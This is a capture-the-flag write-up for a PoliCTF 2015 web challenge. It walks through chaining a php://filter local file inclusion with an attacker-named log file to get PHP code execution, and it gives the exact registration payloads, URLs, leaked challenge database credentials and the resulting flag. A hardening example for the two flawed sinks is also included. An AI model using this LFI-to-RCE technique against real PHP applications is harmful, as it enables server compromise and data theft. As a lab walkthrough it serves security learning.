I visit this website when I'm sad; it contains many magical things that help me find the solution. Focus on your problem and find "the magic thing" that will help you solve it.

Solution:
1. Go to http://magic.polictf.it/index.php?page=register and try Local File Inclusion in the "page" parameter with the base64-encode php filter.
Ex. http://magic.polictf.it/index.php?page=php://filter/convert.base64-encode/resource=index, which lets me read the source of every php file.
2. In index.php, the login handler:

```php
if(isset($_POST["login"])){
    if(isset($_POST["username"]) && isset($_POST["password"]) && !is_array($_POST["username"]) && !is_array($_POST["password"])){
        $user = new User($_POST["username"], $_POST["password"]);
        $login = $user -> login();
        if($login){
            $logger = new Logger(gethostbyaddr($_SERVER["REMOTE_ADDR"]), $user);
            $logger -> log_access();
            header("Location: magic_things.php");
        }
    }
}
```

The gethostbyaddr function resolves my IP address to a hostname, so I go to http://ipinfo.io/ and get my hostname. :)
3. In /classes/logger/logger.php, in __construct I see...

```php
public function __construct($host, $user){
    $this -> host = $host;
    $this -> filename = $_SERVER["DOCUMENT_ROOT"]."log/" . $host . "_" . $user->getSurname();
    $this -> user = $user;
    date_default_timezone_set("UTC");
}
```

The log_access() and initLogFile() functions use fwrite to write the log file. That means the /log folder will contain a log file whose name is my hostname, an underscore, and the surname I entered at registration.
Ex. http://magic.polictf.it/log/ppp-127.0.0.1.revip8.asianet.co.th_surname
I can write a file :D
4. back to index.php
```php
<div id="content"> <?php include($page.".php"); ?> </div>
```

The include function can execute php code!!
Since include() appends ".php" to the page name, I set the "surname" field to name.php so that the log file name ends in .php.
5. In the "name" and "surname" fields I can put php code, e.g. <?php phpinfo(); ?>. I choose to put the php code in the "name" field.
```php
public function log_access(){
    $active = $this -> user -> isActive();
    if(!$active){
        $this -> initLogFile();
    }
    $fo = fopen($this -> filename, 'a');
    if($fo){
        $write = fwrite($fo, date('l jS \of F Y h:i:s A') . " - " . $this -> user -> getUsername() .": log in success\n");
        fclose($fo);
        if($write) return true;
        else return false;
    }
}

public function initLogFile(){
    $fo = fopen($this -> filename, 'w+');
    if($fo){
        $write = fwrite($fo, "name|".$this -> user -> getName().";surname|".$this->user->getSurname().";date_creation|UTC:".date('l jS \of F Y h:i:s A')."\n"); //write header in logfile.
        fclose($fo);
        if($write){
            $this -> user -> setActiveBit(1);
            return true;
        }
        else return false;
    }
}
```

6. In /classes/magic/magic.php, I turn the LFI into remote code execution and call the __call function.

```php
public function __call($iveNeverSeenAnythingSoMagical, $magicArguments) {
    $mysqli = new mysqli("localhost", "magic", "nrqdUz4PMKNFZ7iphnzE", "magicchall");
    $stmt = $mysqli->prepare("SELECT word FROM magic_word");
    $stmt -> execute();
    $stmt -> store_result();
    $stmt -> bind_result($magic_word);
    $stmt -> fetch();
    echo "I THINK THIS IS THE VERY MAGIC THING: " . $magic_word;
    session_destroy();
}
```
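As an added example (not the challenge's own code), here is how the two sinks in this chain could be hardened: the include() of a user-controlled page, and the log file whose name and first line come straight from the registration form. The allowlisted page names, the SafeLogger class and the log directory path are assumptions for illustration.

```php
<?php
// Added example, not the challenge code. Page names, class and paths are assumed.

// Sink 1: include($page.".php") loads any path (php://filter/..., log/...).
// Fix: map the page through a fixed allowlist instead of concatenating input.
function resolve_page(string $page): string {
    $allowed = ['index', 'register', 'login', 'magic_things'];
    if (!in_array($page, $allowed, true)) {
        return __DIR__ . '/index.php';   // unknown page: fall back, never include input
    }
    return __DIR__ . '/' . $page . '.php';
}

// Sink 2: the log file was DOCUMENT_ROOT/log/<host>_<surname> and its first line
// held the raw name/surname, so the registering user chose both the file name
// (ending in .php) and its contents (<?php ... ?>). Fix: no user input in the
// path, user values encoded before they reach disk, log dir outside the web root.
class SafeLogger {
    private string $filename;

    public function __construct(string $logDir, string $username) {
        // Key the file on a hash of the username, not on attacker-controlled text.
        $this->filename = rtrim($logDir, '/') . '/' . hash('sha256', $username) . '.log';
    }

    private static function clean(string $v): string {
        // Drop control characters, then base64-encode so the stored line can never
        // contain "<?php", "|" or ";" no matter what the form submitted.
        return base64_encode(preg_replace('/[\x00-\x1f\x7f]/', '', $v));
    }

    public function initLogFile(string $name, string $surname): bool {
        $line = 'name|' . self::clean($name) . ';surname|' . self::clean($surname)
              . ';date_creation|UTC:' . gmdate('c') . "\n";
        return file_put_contents($this->filename, $line, LOCK_EX) !== false;
    }
}

// Usage: the log directory must not be served by the web server; the chain above
// relied on http://magic.polictf.it/log/<host>_<surname> being reachable.
$logger = new SafeLogger('/var/log/magicapp', 'icheernoom');
$logger->initLogFile('<?php phpinfo(); ?>', 'icheernoom.php');
```

With this in place a payload in the name field is stored base64-encoded in a fixed .log file under /var/log, so neither page=log/... nor a .php surname gives include() anything to execute.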
Exploitation:
Step 1: Register - http://magic.polictf.it/index.php?page=register
Name: <?php $magic = new Magic(); $magic->__call(); ?>
Surname: icheernoom.php
User: icheernoom
Password: icheernoom
Step 2: Login - http://magic.polictf.it/index.php?page=login
User: icheernoom
Password: icheernoom
Step 3: Access to http://magic.polictf.it/index.php?page=log/ppp-127.0.0.1.revip8.asianet.co.th_icheernoom
Get a flag!
```html
<div id="content"> name|I THINK THIS IS THE VERY MAGIC THING: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()};surname|icheernoom.php;date_creation|UTC:Saturday 11th of July 2015 06:52:15 PM Saturday 11th of July 2015 06:52:15 PM - icheernoom: log in success </div>
```

My Automate Script:
Explorer:
and more...
Flag: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()}